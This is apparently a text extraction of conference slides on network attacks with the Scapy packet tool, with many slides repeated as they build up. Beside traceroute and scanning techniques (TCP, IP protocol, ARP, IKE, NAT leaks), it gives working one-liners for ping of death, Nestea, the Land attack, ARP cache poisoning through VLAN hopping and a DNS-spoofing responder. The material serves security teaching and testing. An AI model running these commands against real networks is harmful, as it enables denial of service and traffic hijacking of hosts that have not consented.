97 Sending and Receiving >>> Packet generation and network based attacks with
98 Sending and Receiving >>> sr( IP(dst="target", ttl=(10,20))/tcp(sport=randshort()) ) Packet generation and network based attacks with
99 Sending and Receiving >>> sr( IP(dst="target", ttl=(10,20))/tcp(sport=randshort()) ) Begin emission:...*..*.*.*.*.*.***** Packet generation and network based attacks with
100 Sending and Receiving >>> sr( IP(dst="target", ttl=(10,20))/tcp(sport=randshort()) ) Begin emission:...*..*.*.*.*.*.*****finished to send 11 packets. Received 27 packets, got 11 answers, remaining 0 packets (< Results: UDP:0 TCP:6 ICMP:5 Other:0>, < Unanswered: UDP:0 TCP:0 ICMP:0 Other:0>) >>> Packet generation and network based attacks with
101 Sending and Receiving >>> sr( IP(dst="target", ttl=(10,20))/tcp(sport=randshort()) ) Begin emission:...*..*.*.*.*.*.*****finished to send 11 packets. Received 27 packets, got 11 answers, remaining 0 packets (< Results: UDP:0 TCP:6 ICMP:5 Other:0>, < Unanswered: UDP:0 TCP:0 ICMP:0 Other:0>) >>> res,unans=_ >>> Packet generation and network based attacks with
102 Sending and Receiving >>> sr( IP(dst="target", ttl=(10,20))/tcp(sport=randshort()) ) Begin emission:...*..*.*.*.*.*.*****finished to send 11 packets. Received 27 packets, got 11 answers, remaining 0 packets (< Results: UDP:0 TCP:6 ICMP:5 Other:0>, < Unanswered: UDP:0 TCP:0 ICMP:0 Other:0>) >>> res,unans=_ >>> res.summary() IP / TCP :37462 > :80 S ==> Ether / IP / ICMP time-exceeded 0 / IPerror / TCPerror / Padding IP / TCP :45394 > :80 S ==> Ether / IP / ICMP time-exceeded 0 / IPerror / IP / TCP :39265 > :80 S ==> Ether / IP / ICMP time-exceeded 0 / IPerror / T IP / TCP :63692 > :80 S ==> Ether / IP / ICMP time-exceeded 0 / IPerror / T IP / TCP :61857 > :80 S ==> Ether / IP / ICMP time-exceeded 0 / IPerror / T IP / TCP :28186 > :80 S ==> Ether / IP / TCP :80 > :28186 SA / Padding IP / TCP :9747 > :80 S ==> Ether / IP / TCP :80 > :9747 SA / Padding IP / TCP :62614 > :80 S ==> Ether / IP / TCP :80 > :62614 SA / Padding IP / TCP :9146 > :80 S ==> Ether / IP / TCP :80 > :9146 SA / Padding IP / TCP :44469 > :80 S ==> Ether / IP / TCP :80 > :44469 SA / Padding IP / TCP :6862 > :80 S ==> Ether / IP / TCP :80 > :6862 SA / Padding Packet generation and network based attacks with
103 Sending and Receiving >>> sr( IP(dst="target", ttl=(10,20))/tcp(sport=randshort()) ) Begin emission:...*..*.*.*.*.*.*****finished to send 11 packets. Received 27 packets, got 11 answers, remaining 0 packets (< Results: UDP:0 TCP:6 ICMP:5 Other:0>, < Unanswered: UDP:0 TCP:0 ICMP:0 Other:0>) >>> res,unans=_ >>> res.summary() IP / TCP :37462 > :80 S ==> Ether / IP / ICMP time-exceeded 0 / IPerror / TCPerror / Padding IP / TCP :45394 > :80 S ==> Ether / IP / ICMP time-exceeded 0 / IPerror / IP / TCP :39265 > :80 S ==> Ether / IP / ICMP time-exceeded 0 / IPerror / T IP / TCP :63692 > :80 S ==> Ether / IP / ICMP time-exceeded 0 / IPerror / T IP / TCP :61857 > :80 S ==> Ether / IP / ICMP time-exceeded 0 / IPerror / T IP / TCP :28186 > :80 S ==> Ether / IP / TCP :80 > :28186 SA / Padding IP / TCP :9747 > :80 S ==> Ether / IP / TCP :80 > :9747 SA / Padding IP / TCP :62614 > :80 S ==> Ether / IP / TCP :80 > :62614 SA / Padding IP / TCP :9146 > :80 S ==> Ether / IP / TCP :80 > :9146 SA / Padding IP / TCP :44469 > :80 S ==> Ether / IP / TCP :80 > :44469 SA / Padding IP / TCP :6862 > :80 S ==> Ether / IP / TCP :80 > :6862 SA / Padding First (stimulus,response) couple Packet generation and network based attacks with
104 Sending and Receiving >>> sr( IP(dst="target", ttl=(10,20))/tcp(sport=randshort()) ) Begin emission:...*..*.*.*.*.*.*****finished to send 11 packets. Received 27 packets, got 11 answers, remaining 0 packets (< Results: UDP:0 TCP:6 ICMP:5 Other:0>, < Unanswered: UDP:0 TCP:0 ICMP:0 Other:0>) >>> res,unans=_ >>> res.summary() IP / TCP :37462 > :80 S ==> Ether / IP / ICMP time-exceeded 0 / IPerror / TCPerror / Padding IP / TCP :45394 > :80 S ==> Ether / IP / ICMP time-exceeded 0 / IPerror / IP / TCP :39265 > :80 S ==> Ether / IP / ICMP time-exceeded 0 / IPerror / T IP / TCP :63692 > :80 S ==> Ether / IP / ICMP time-exceeded 0 / IPerror / T IP / TCP :61857 > :80 S ==> Ether / IP / ICMP time-exceeded 0 / IPerror / T IP / TCP :28186 > :80 S ==> Ether / IP / TCP :80 > :28186 SA / Padding IP / TCP :9747 > :80 S ==> Ether / IP / TCP :80 > :9747 SA / Padding IP / TCP :62614 > :80 S ==> Ether / IP / TCP :80 > :62614 SA / Padding IP / TCP :9146 > :80 S ==> Ether / IP / TCP :80 > :9146 SA / Padding IP / TCP :44469 > :80 S ==> Ether / IP / TCP :80 > :44469 SA / Padding IP / TCP :6862 > :80 S ==> Ether / IP / TCP :80 > :6862 SA / Padding Stimulus we sent Packet generation and network based attacks with
105 Sending and Receiving >>> sr( IP(dst="target", ttl=(10,20))/tcp(sport=randshort()) ) Begin emission:...*..*.*.*.*.*.*****finished to send 11 packets. Received 27 packets, got 11 answers, remaining 0 packets (< Results: UDP:0 TCP:6 ICMP:5 Other:0>, < Unanswered: UDP:0 TCP:0 ICMP:0 Other:0>) >>> res,unans=_ >>> res.summary() IP / TCP :37462 > :80 S ==> Ether / IP / ICMP time-exceeded 0 / IPerror / TCPerror / Padding IP / TCP :45394 > :80 S ==> Ether / IP / ICMP time-exceeded 0 / IPerror / IP / TCP :39265 > :80 S ==> Ether / IP / ICMP time-exceeded 0 / IPerror / T IP / TCP :63692 > :80 S ==> Ether / IP / ICMP time-exceeded 0 / IPerror / T IP / TCP :61857 > :80 S ==> Ether / IP / ICMP time-exceeded 0 / IPerror / T IP / TCP :28186 > :80 S ==> Ether / IP / TCP :80 > :28186 SA / Padding IP / TCP :9747 > :80 S ==> Ether / IP / TCP :80 > :9747 SA / Padding IP / TCP :62614 > :80 S ==> Ether / IP / TCP :80 > :62614 SA / Padding IP / TCP :9146 > :80 S ==> Ether / IP / TCP :80 > :9146 SA / Padding IP / TCP :44469 > :80 S ==> Ether / IP / TCP :80 > :44469 SA / Padding IP / TCP :6862 > :80 S ==> Ether / IP / TCP :80 > :6862 SA / Padding Response we got Packet generation and network based attacks with
106 Sending and Receiving >>> sr( IP(dst="target", ttl=(10,20))/tcp(sport=randshort()) ) Begin emission:...*..*.*.*.*.*.*****finished to send 11 packets. Received 27 packets, got 11 answers, remaining 0 packets (< Results: UDP:0 TCP:6 ICMP:5 Other:0>, < Unanswered: UDP:0 TCP:0 ICMP:0 Other:0>) >>> res,unans=_ >>> res.summary() IP / TCP :37462 > :80 S ==> Ether / IP / ICMP time-exceeded 0 / IPerror / TCPerror / Padding IP / TCP :45394 > :80 S ==> Ether / IP / ICMP time-exceeded 0 / IPerror / IP / TCP :39265 > :80 S ==> Ether / IP / ICMP time-exceeded 0 / IPerror / T IP / TCP :63692 > :80 S ==> Ether / IP / ICMP time-exceeded 0 / IPerror / T IP / TCP :61857 > :80 S ==> Ether / IP / ICMP time-exceeded 0 / IPerror / T IP / TCP :28186 > :80 S ==> Ether / IP / TCP :80 > :28186 SA / Padding IP / TCP :9747 > :80 S ==> Ether / IP / TCP :80 > :9747 SA / Padding IP / TCP :62614 > :80 S ==> Ether / IP / TCP :80 > :62614 SA / Padding IP / TCP :9146 > :80 S ==> Ether / IP / TCP :80 > :9146 SA / Padding IP / TCP :44469 > :80 S ==> Ether / IP / TCP :80 > :44469 SA / Padding IP / TCP :6862 > :80 S ==> Ether / IP / TCP :80 > :6862 SA / Padding Interesting to see there was unexpected padding. Is it a leak? Packet generation and network based attacks with
107 Result Manipulation Introduction Interesting to see there was unexpected padding. Is it a leak? >>> Packet generation and network based attacks with
108 Result Manipulation Introduction Interesting to see there was unexpected padding. Is it a leak? >>> res Packet generation and network based attacks with
109 Result Manipulation Introduction Interesting to see there was unexpected padding. Is it a leak? >>> res[0] Packet generation and network based attacks with
110 Result Manipulation Introduction Interesting to see there was unexpected padding. Is it a leak? >>> res[0][1] Packet generation and network based attacks with
111 Result Manipulation Introduction Interesting to see there was unexpected padding. Is it a leak? >>> res[0][1] < IP version=4l ihl=5l tos=0x0 len=168 id=1648 flags=df frag=0l ttl=248 proto=icmp chksum=0xab91 src= dst= options= < ICMP type=time-exceeded code=0 chksum=0xb9e id=0x0 seq=0x0 < IPerror version=4l ihl=5l tos=0x0 len=44 id=1 flags= frag=0l ttl=1 proto=tcp chksum=0xa34c src= dst= options= < TCPerror sport=37462 dport=80 seq=0l ack=0l dataofs=6l reserved=0l flags=s window=0 chksum=0xef00 urgptr=0 options=[( MSS, 1460)] < Padding load= \x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 [...] \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00 \x00q\xe1\x00\x08\x01\x01\xb4\x13\xd9\x01 >>>>> >>> Packet generation and network based attacks with
112 Result Manipulation Introduction Interesting to see there was unexpected padding. Is it a leak? >>> res[0][1] < IP version=4l ihl=5l tos=0x0 len=168 id=1648 flags=df frag=0l ttl=248 proto=icmp chksum=0xab91 src= dst= options= < ICMP type=time-exceeded code=0 chksum=0xb9e id=0x0 seq=0x0 < IPerror version=4l ihl=5l tos=0x0 len=44 id=1 flags= frag=0l ttl=1 proto=tcp chksum=0xa34c src= dst= options= < TCPerror sport=37462 dport=80 seq=0l ack=0l dataofs=6l reserved=0l flags=s window=0 chksum=0xef00 urgptr=0 options=[( MSS, 1460)] < Padding load= \x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 [...] \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00 \x00q\xe1\x00\x08\x01\x01\xb4\x13\xd9\x01 >>>>> >>> res[1][1] Packet generation and network based attacks with
113 Result Manipulation Introduction Interesting to see there was unexpected padding. Is it a leak? >>> res[0][1] < IP version=4l ihl=5l tos=0x0 len=168 id=1648 flags=df frag=0l ttl=248 proto=icmp chksum=0xab91 src= dst= options= < ICMP type=time-exceeded code=0 chksum=0xb9e id=0x0 seq=0x0 < IPerror version=4l ihl=5l tos=0x0 len=44 id=1 flags= frag=0l ttl=1 proto=tcp chksum=0xa34c src= dst= options= < TCPerror sport=37462 dport=80 seq=0l ack=0l dataofs=6l reserved=0l flags=s window=0 chksum=0xef00 urgptr=0 options=[( MSS, 1460)] < Padding load= \x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 [...] \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00 \x00q\xe1\x00\x08\x01\x01\xb4\x13\xd9\x01 >>>>> >>> res[1][1].getlayer( ) Packet generation and network based attacks with
114 Result Manipulation Introduction Interesting to see there was unexpected padding. Is it a leak? >>> res[0][1] < IP version=4l ihl=5l tos=0x0 len=168 id=1648 flags=df frag=0l ttl=248 proto=icmp chksum=0xab91 src= dst= options= < ICMP type=time-exceeded code=0 chksum=0xb9e id=0x0 seq=0x0 < IPerror version=4l ihl=5l tos=0x0 len=44 id=1 flags= frag=0l ttl=1 proto=tcp chksum=0xa34c src= dst= options= < TCPerror sport=37462 dport=80 seq=0l ack=0l dataofs=6l reserved=0l flags=s window=0 chksum=0xef00 urgptr=0 options=[( MSS, 1460)] < Padding load= \x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 [...] \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00 \x00q\xe1\x00\x08\x01\x01\xb4\x13\xd9\x01 >>>>> >>> res[1][1].getlayer(padding) Packet generation and network based attacks with
115 Result Manipulation Introduction Interesting to see there was unexpected padding. Is it a leak? >>> res[0][1] < IP version=4l ihl=5l tos=0x0 len=168 id=1648 flags=df frag=0l ttl=248 proto=icmp chksum=0xab91 src= dst= options= < ICMP type=time-exceeded code=0 chksum=0xb9e id=0x0 seq=0x0 < IPerror version=4l ihl=5l tos=0x0 len=44 id=1 flags= frag=0l ttl=1 proto=tcp chksum=0xa34c src= dst= options= < TCPerror sport=37462 dport=80 seq=0l ack=0l dataofs=6l reserved=0l flags=s window=0 chksum=0xef00 urgptr=0 options=[( MSS, 1460)] < Padding load= \x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 [...] \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00 \x00q\xe1\x00\x08\x01\x01\xb4\x13\xd9\x01 >>>>> >>> res[1][1].getlayer(padding).load Packet generation and network based attacks with
116 Result Manipulation Introduction Interesting to see there was unexpected padding. Is it a leak? >>> res[0][1] < IP version=4l ihl=5l tos=0x0 len=168 id=1648 flags=df frag=0l ttl=248 proto=icmp chksum=0xab91 src= dst= options= < ICMP type=time-exceeded code=0 chksum=0xb9e id=0x0 seq=0x0 < IPerror version=4l ihl=5l tos=0x0 len=44 id=1 flags= frag=0l ttl=1 proto=tcp chksum=0xa34c src= dst= options= < TCPerror sport=37462 dport=80 seq=0l ack=0l dataofs=6l reserved=0l flags=s window=0 chksum=0xef00 urgptr=0 options=[( MSS, 1460)] < Padding load= \x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 [...] \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00 \x00q\xe1\x00\x08\x01\x01\xb4\x13\xd9\x01 >>>>> >>> res[1][1].getlayer(padding).load[-13:] Packet generation and network based attacks with
117 Result Manipulation Introduction Interesting to see there was unexpected padding. Is it a leak? >>> res[0][1] < IP version=4l ihl=5l tos=0x0 len=168 id=1648 flags=df frag=0l ttl=248 proto=icmp chksum=0xab91 src= dst= options= < ICMP type=time-exceeded code=0 chksum=0xb9e id=0x0 seq=0x0 < IPerror version=4l ihl=5l tos=0x0 len=44 id=1 flags= frag=0l ttl=1 proto=tcp chksum=0xa34c src= dst= options= < TCPerror sport=37462 dport=80 seq=0l ack=0l dataofs=6l reserved=0l flags=s window=0 chksum=0xef00 urgptr=0 options=[( MSS, 1460)] < Padding load= \x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 [...] \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00 \x00q\xe1\x00\x08\x01\x01\xb4\x13\xd9\x01 >>>>> >>> res[1][1].getlayer(padding).load[-13:] \x00 \x00s\xa9\x00\x08\x01\x01\xb2k\xd9\x01 Packet generation and network based attacks with
118 Result Manipulation Introduction Back to the traceroute stuff >>> Packet generation and network based attacks with
119 Result Manipulation Introduction Back to the traceroute stuff >>> res.make_table( ) Packet generation and network based attacks with
120 Result Manipulation Introduction Back to the traceroute stuff >>> res.make_table( lambda (s,r): (s.dst, s.ttl, r.sprintf("%ip.src% \t {TCP:%TCP.flags%}")) ) Packet generation and network based attacks with
121 Result Manipulation Introduction Back to the traceroute stuff >>> res.make_table( lambda (s,r): (s.dst, s.ttl, r.sprintf("%ip.src% \t {TCP:%TCP.flags%}")) ) SA SA SA SA SA SA Packet generation and network based attacks with
122 Different Kinds of Packet Lists PacketList: vanilla packet lists Dot11PacketList: oriented stats, toethernet() method SndRcvList: vanilla lists of (send,received) couples ARPingResult: ARPing oriented show() TracerouteResult: traceroute oriented show(), graph() method for graphic representation, world trace() for localized path PacketList SndRcvList Dot11PacketList TracerouteResult ARPingResult Packet generation and network based attacks with
123 High-Level commands Traceroute >>> ans,unans=traceroute([" Packet generation and network based attacks with
124 High-Level commands Traceroute >>> ans,unans=traceroute([" Received 90 packets, got 90 answers, remaining 0 packets :tcp :tcp :tcp [...] SA SA SA SA SA SA [...] >>> Packet generation and network based attacks with
125 High-Level commands Traceroute >>> ans,unans=traceroute([" Received 90 packets, got 90 answers, remaining 0 packets :tcp :tcp :tcp [...] SA SA SA SA SA SA [...] >>> ans[0][1] < IP version=4l ihl=5l tos=0xc0 len=68 id=11202 flags= frag=0l ttl=64 proto=icmp chksum=0xd6b3 src= dst= options= < ICMP type=time-exceeded code=0 chksum=0x5a20 id=0x0 seq=0x0 < IPerror version=4l ihl=5l tos=0x0 len=40 id=14140 flags= frag=0l ttl=1 proto=tcp chksum=0x1d8f src= dst= options= < TCPerror sport=18683 dport=80 seq= l ack=0l dataofs=5l reserved=16l flags=s window=0 chksum=0x5d3a urgptr=0 >>>> >>> Packet generation and network based attacks with
126 High-Level commands Traceroute >>> ans,unans=traceroute([" Received 90 packets, got 90 answers, remaining 0 packets :tcp :tcp :tcp [...] SA SA SA SA SA SA [...] >>> ans[0][1] < IP version=4l ihl=5l tos=0xc0 len=68 id=11202 flags= frag=0l ttl=64 proto=icmp chksum=0xd6b3 src= dst= options= < ICMP type=time-exceeded code=0 chksum=0x5a20 id=0x0 seq=0x0 < IPerror version=4l ihl=5l tos=0x0 len=40 id=14140 flags= frag=0l ttl=1 proto=tcp chksum=0x1d8f src= dst= options= < TCPerror sport=18683 dport=80 seq= l ack=0l dataofs=5l reserved=16l flags=s window=0 chksum=0x5d3a urgptr=0 >>>> >>> ans[57][1].summary() Ether / IP / TCP :80 > :34711 SA / Padding Packet generation and network based attacks with
127 High-Level commands Traceroute graphing, AS clustering >>> ans.graph() Packet generation and network based attacks with
128 High-Level commands Traceroute graphing, AS clustering [...] 3356 [LEVEL3 Level 3 Communications] [ATT-INTERNET4 - AT&T WorldNet] >>> ans.graph() [MICROSOFT-CORP---MSN-AS-BLOCK] [CISCO-EU-109 Cisco Systems Glo] : SA [HOTMAIL-AS - Hotmail Corporati] [APPLE-ENGINEERING - Apple Comp] : SA : SA Packet generation and network based attacks with
129 High-Level commands Traceroute graphing, AS clustering : SA [HOTMAIL-AS - Hotmail Corporati] [APPLE-ENGINEERING - Apple Comp] : SA : SA Packet generation and network based attacks with
130 Answering machines Introduction An answering machine enables you to quickly design a stimulus/response daemon Already implemented: fake DNS server, ARP spoofer, DHCP daemon, FakeARPd, Airpwn clone Interface description class Demo_am(AnsweringMachine): function_name = "demo" filter = "a bpf filter if needed" def parse_options(self,...):... def is_request(self, req):... return 1 if req is a request def make_reply(self, req):... return the reply for req Packet generation and network based attacks with
131 Answering machines Introduction class DNS am( AnsweringMachine ) : function name=" dns_spoof" f i l t e r = "udp port 53" def parse options ( self, joker=" ", zone=none ) : i f zone i s None : zone = {} s e l f. zone = zone s e l f. joker=joker def is request ( self, req ) : return req. haslayer (DNS) and req. getlayer (DNS). qr == 0 def make reply ( self, req ) : ip = req. getlayer ( IP ) dns = req. getlayer (DNS) resp = IP ( dst=ip. src, src=ip. dst )/UDP( dport=ip. sport, sport rdata = s e l f. zone. get ( dns. qd. qname, s e l f. joker ) resp /= DNS( id=dns. id, qr =1, qd=dns. qd, an=dnsrr( rrname=dns. qd. qname, t t l =10, rdata=rd return resp Packet generation and network based attacks with
132 Outline Introduction One shots Scanning TTL tricks 1 Introduction Forewords Learning Python in 2 slides State of the art Problematic 2 3 One shots Scanning TTL tricks 4 Conclusion Packet generation and network based attacks with
133 0ld school Introduction One shots Scanning TTL tricks Malformed packets send(ip(dst=" ", ihl=2, version=3)/icmp()) Ping of death (Muuahahah) for p in fragment(ip(dst=" ")/icmp()/("x"*60000)): send(p) Nestea attack send(ip(dst=target, id=42, flags="mf")/udp()/("x"*10)) send(ip(dst=target, id=42, frag=48)/("x"*116)) send(ip(dst=target, id=42, flags="mf")/udp()/("x"*224)) Land attack (designed for Microsoft r Windows r ) send(ip(src=target,dst=target)/tcp(sport=135,dport=135)) Packet generation and network based attacks with
134 One shots Scanning TTL tricks ARP cache poisoning through VLAN hopping This attack prevents a client from joining the gateway by poisoning its ARP cache through a VLAN hopping attack. Classic ARP cache poisoning send( Ether(dst=clientMAC) /ARP(op="who-has", psrc=gateway, pdst=client), inter=randnum(10,40), loop=1 ) ARP cache poisoning with double 802.1q encapsulation send( Ether(dst=clientMAC)/Dot1Q(vlan=1)/Dot1Q(vlan=2) /ARP(op="who-has", psrc=gateway, pdst=client), inter=randnum(10,40), loop=1 ) Packet generation and network based attacks with
135 Outline Introduction One shots Scanning TTL tricks 1 Introduction Forewords Learning Python in 2 slides State of the art Problematic 2 3 One shots Scanning TTL tricks 4 Conclusion Packet generation and network based attacks with
136 TCP port scan Introduction One shots Scanning TTL tricks Send a TCP SYN on each port Wait for a SYN-ACK or a RST or an ICMP error Sending packets res,unans = sr( IP(dst="target") /TCP(flags="S", dport=(1,1024)) ) Possible result interpretation: open ports res.nsummary( filter=lambda (s,r): \ (r.haslayer(tcp) and \ (r.getlayer(tcp).flags & 2)) ) Packet generation and network based attacks with
137 One shots Scanning TTL tricks Detect fake TCP replies [Ed3f] Send a TCP/IP packet with correct IP checksum and bad TCP checksum A real TCP stack will drop the packet Some filters or MitM programs will not check it and answer Sending packets res,unans = sr( IP(dst="target") /TCP(dport=(1,1024),chksum=0xBAD) ) Possible result interpretation: fake replies res.summary() Packet generation and network based attacks with
138 IP protocol scan Introduction One shots Scanning TTL tricks Send IP packets with every possible value in the protocol field. Protocol not recognized by the host = ICMP protocol unreachable Better results if the IP payload is not empty Sending packets res,unans = sr( IP(dst="target", proto=(0,255))/"xx" ) Possible result interpretation: recognized protocols unans.nsummary(prn=lambda s:s.proto) Packet generation and network based attacks with
139 IP protocol scan with fixed TTL One shots Scanning TTL tricks Send IP packets with every possible value in the protocol field and a well chosen TTL Protocol not filtered by the router = ICMP time exceeded in transit Sending packets res,unans = sr( IP(dst="target", proto=(0,255), ttl=7)/"xx", retry=-2 ) Possible result interpretation: filtered protocols unans.nsummary(prn=lambda s:s.proto) Packet generation and network based attacks with
140 ARP ping Introduction One shots Scanning TTL tricks Ask every IP of our neighbourhood for its MAC address = Quickly find alive IP = Even firewalled ones (firewalls usually don t work at Ethernet or ARP level) Sending packets res,unans = srp(ether(dst="ff:ff:ff:ff:ff:ff") /ARP(pdst=" /24")) Possible result interpretation: neighbours res.summary( lambda (s,r): r.sprintf("%ether.src% %ARP.psrc%") ) Note: The high-level function arping() does that. Packet generation and network based attacks with
141 IKE scan Introduction One shots Scanning TTL tricks Scan with an ISAKMP Security Association proposal = VPN concentrators will answer Sending packets res,unans= sr( IP(dst=" *") /UDP() /ISAKMP(init_cookie=RandString(8), exch_type="identity prot.") /ISAKMP_payload_SA(prop=ISAKMP_payload_Proposal()) ) Possible result interpretation: VPN concentrators list res.nsummary( prn=lambda (s,r): r.src, filter=lambda (s,r): r.haslayer(isakmp) ) Packet generation and network based attacks with
142 Outline Introduction One shots Scanning TTL tricks 1 Introduction Forewords Learning Python in 2 slides State of the art Problematic 2 3 One shots Scanning TTL tricks 4 Conclusion Packet generation and network based attacks with
143 Applicative UDP Traceroute One shots Scanning TTL tricks Tracerouting an UDP application like we do with TCP is not reliable (no handshake) We need to give an applicative payload (DNS, ISAKMP, NTP,...) to deserve an answer Send packets res,unans = sr(ip(dst="target", ttl=(1,20)) /UDP() /DNS(qd=DNSQR(qname="test.com")) Possible result interpretation: List of routers res.make_table(lambda (s,r): (s.dst, s.ttl, r.src)) Packet generation and network based attacks with
144 NAT finding Introduction One shots Scanning TTL tricks Do a TCP traceroute or a UDP applicative traceroute If the target IP answers an ICMP time exceeded in transit before answering to the handshake, there is a Destination NAT >>> traceroute(" ",dport=443) Received 31 packets, got 30 answers, remaining 0 packets :tcp SA SA Packet generation and network based attacks with
145 NAT finding Introduction One shots Scanning TTL tricks Do a TCP traceroute or a UDP applicative traceroute If the target IP answers an ICMP time exceeded in transit before answering to the handshake, there is a Destination NAT >>> traceroute(" ",dport=443) Received 31 packets, got 30 answers, remaining 0 packets :tcp SA SA Packet generation and network based attacks with
146 One shots Scanning TTL tricks NAT leaks We ve found a DNAT. How to find the real destination? Some NAT programs have the following bug : they NAT the packet they decrement the TTL if the TTL expired, send an ICMP message with the packet as a citation = ohoh, they forgot to unnat the citation! Side effects the citation does not match the request = (real) stateful firewalls don t recognize the ICMP message and drop it = traceroute and programs that play with TTL don t see it either Packet generation and network based attacks with
147 One shots Scanning TTL tricks NAT leaks We ve found a DNAT. How to find the real destination? Some NAT programs have the following bug : they NAT the packet they decrement the TTL if the TTL expired, send an ICMP message with the packet as a citation = ohoh, they forgot to unnat the citation! Side effects the citation does not match the request = (real) stateful firewalls don t recognize the ICMP message and drop it = traceroute and programs that play with TTL don t see it either Packet generation and network based attacks with
148 One shots Scanning TTL tricks NAT leaks We ve found a DNAT. How to find the real destination? Some NAT programs have the following bug : they NAT the packet they decrement the TTL if the TTL expired, send an ICMP message with the packet as a citation = ohoh, they forgot to unnat the citation! Side effects the citation does not match the request = (real) stateful firewalls don t recognize the ICMP message and drop it = traceroute and programs that play with TTL don t see it either Packet generation and network based attacks with
149 One shots Scanning TTL tricks NAT leaks We ve found a DNAT. How to find the real destination? >>> traceroute(" ",dport=443) Received 31 packets, got 30 answers, remaining 0 packets :tcp missing hop SA SA Packet generation and network based attacks with
150 One shots Scanning TTL tricks NAT leaks We ve found a DNAT. How to find the real destination? is able to handle that : >>> Packet generation and network based attacks with
151 One shots Scanning TTL tricks NAT leaks We ve found a DNAT. How to find the real destination? is able to handle that : >>> conf.checkipsrc = 0 >>> Packet generation and network based attacks with
152 One shots Scanning TTL tricks NAT leaks We ve found a DNAT. How to find the real destination? is able to handle that : >>> conf.checkipsrc = 0 >>> ans,unans = traceroute(" ",dport=443) Received 31 packets, got 30 answers, remaining 0 packets :tcp SA SA >>> Packet generation and network based attacks with
153 One shots Scanning TTL tricks NAT leaks We ve found a DNAT. How to find the real destination? is able to handle that : >>> conf.checkipsrc = 0 >>> ans,unans = traceroute(" ",dport=443) [...] SA >>> Packet generation and network based attacks with
154 One shots Scanning TTL tricks NAT leaks We ve found a DNAT. How to find the real destination? is able to handle that : >>> conf.checkipsrc = 0 >>> ans,unans = traceroute(" ",dport=443) [...] SA >>> ans[6][1] Packet generation and network based attacks with
155 One shots Scanning TTL tricks NAT leaks We ve found a DNAT. How to find the real destination? is able to handle that : >>> conf.checkipsrc = 0 >>> ans,unans = traceroute(" ",dport=443) [...] SA >>> ans[6][1] < IP version=4l ihl=5l tos=0xc0 len=68 id=38097 flags= frag=0l ttl=49 proto=icmp chksum=0xb7db src= dst= options= < ICMP type=time-exceeded code=0 chksum=0x358 id=0x0 seq=0x0 < IPerror version=4l ihl=5l tos=0x0 len=40 id=1 flags= frag=0l ttl=1 proto=tcp chksum=0xab92 src= dst= options= < TCPerror sport=20 dport=22 seq=0l ack=0l dataofs=5l reserved=16l flags=s window=0 chksum=0x8a37 urgptr=0 >>>> Packet generation and network based attacks with
156 One shots Scanning TTL tricks NAT leaks We ve found a DNAT. How to find the real destination? is able to handle that : >>> conf.checkipsrc = 0 >>> ans,unans = traceroute(" ",dport=443) [...] SA >>> ans[6][1] < IP version=4l ihl=5l tos=0xc0 len=68 id=38097 flags= frag=0l ttl=49 proto=icmp chksum=0xb7db src= dst= options= < ICMP type=time-exceeded code=0 chksum=0x358 id=0x0 seq=0x0 < IPerror version=4l ihl=5l tos=0x0 len=40 id=1 flags= frag=0l ttl=1 proto=tcp chksum=0xab92 src= dst= options= < TCPerror sport=20 dport=22 seq=0l ack=0l dataofs=5l reserved=16l flags=s window=0 chksum=0x8a37 urgptr=0 >>>> Packet generation and network based attacks with
157 One shots Scanning TTL tricks NAT leaks We ve found a DNAT. How to find the real destination? is able to handle that : >>> conf.checkipsrc = 0 >>> ans,unans = traceroute(" ",dport=443) [...] SA >>> ans[6][1] < IP version=4l ihl=5l tos=0xc0 len=68 id=38097 flags= frag=0l ttl=49 proto=icmp chksum=0xb7db src= dst= options= < ICMP type=time-exceeded code=0 chksum=0x358 id=0x0 seq=0x0 < IPerror version=4l ihl=5l tos=0x0 len=40 id=1 flags= frag=0l ttl=1 proto=tcp chksum=0xab92 src= dst= options= < TCPerror sport=20 dport=22 seq=0l ack=0l dataofs=5l reserved=16l flags=s window=0 chksum=0x8a37 urgptr=0 >>>> Packet generation and network based attacks with
158 NAT enumeration How many boxes behind this IP? One shots Scanning TTL tricks >>> a,b=sr( IP(dst="target")/TCP(sport=[RandShort()]*1000) ) >>> a.plot(lambda (s,r): r.id) Packet generation and network based attacks with
159 One shots Scanning TTL tricks Sliced Network Scan A way to give a depth to a simple flat network port scan 1 Use nmap to scan the whole target network 2 Spot interesting ports : open and closed ports, and some witness filtered ports 3 With a traceroute, find the TTL t one hop before the network s first router 4 Scan the network on these ports for TTL t ans,unans=sr( IP(dst="network/24", ttl=t) /TCP(dport=[21,25,53,80,443,2]), retry=-2 ) 5 Display the scanned slice : ans.make_table(lambda (s,r): (s.dport, s.dst, r.sprintf("%ip.id% {TCP:%TCP.flags%}\ {ICMP:%IP.src% %ir,icmp.type%}"))) 6 Increment t and go to 4 Packet generation and network based attacks with
160 Sliced Network Scan Results Interpretation : first router One shots Scanning TTL tricks TTL= RA RA 6413 RA 6414 RA 6415 RA RA RA RA RA RA RA The first IP to answer something is the router. The router has IP on one side and on the other We can see that the IP ID are consecutives. The router blocks ident port with Reset-Ack. Packet generation and network based attacks with
